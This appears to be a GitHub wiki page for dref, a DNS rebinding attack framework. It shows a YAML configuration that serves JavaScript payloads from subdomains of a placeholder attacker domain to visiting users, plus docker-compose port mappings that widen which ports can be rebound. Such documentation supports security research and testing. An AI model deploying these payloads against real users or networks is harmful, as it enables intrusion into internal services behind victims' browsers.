-
Notifications
You must be signed in to change notification settings - Fork 71
Using Payloads
Payload configuration is currently defined in the dref-config.yml file located in the project's root directory.
The default configuration file looks like this:
general:
domain: attacker.com
address: 1.2.3.4
targets:
- target: "demo"
script: "web-discover"The targets section of the configuration is a list of YAML "target" objects. These are the payloads that are configured to be delivered by dref.
The target key serves a couple of purposes internally, but it is mainly the subdomain that delivers the payload.
The script key is the payload script that will be delivered when a user visits the target subdomain. These are defined in dref/scripts/src/payloads/.
In plain English the configuration above says:
When a user visits
demo.attacker.comdeliver thepayloads/web-discover.jsscript.
At this point, the Docker environment has to be restarted to reflect changes made to the dref-config.yml file:
$ docker-compose down
$ docker-compose up -d| Key | Type | Description |
|---|---|---|
target |
String | Target subdomain that will deliver the initial payload. Must be a valid subdomain string. |
script |
String | Payload delivered by the target subdomain. Must be a JavaScript file located in dref/scripts/src/payloads/. |
args |
Object | Valid YAML sub-object containing arguments to be passed to the script. These arguments will be accessible to the script payload as globals under window.args. Must be a valid YAML object. |
By default dref allows you to rebind on the standard web ports 80, 8000, 8080 and 8888. This is controlled by the docker-compose port mapping for the api container in docker-compose.yml.
To support DNS rebinding on an additional port, simply add a mapping from that port on the host to port 80 in the api container by editing docker-compose.yml. For example to support DNS rebinding on port 4000, the configuration would look like:
api:
image: node:9.11.1-alpine
networks:
- dref
ports:
- 0.0.0.0:4000:80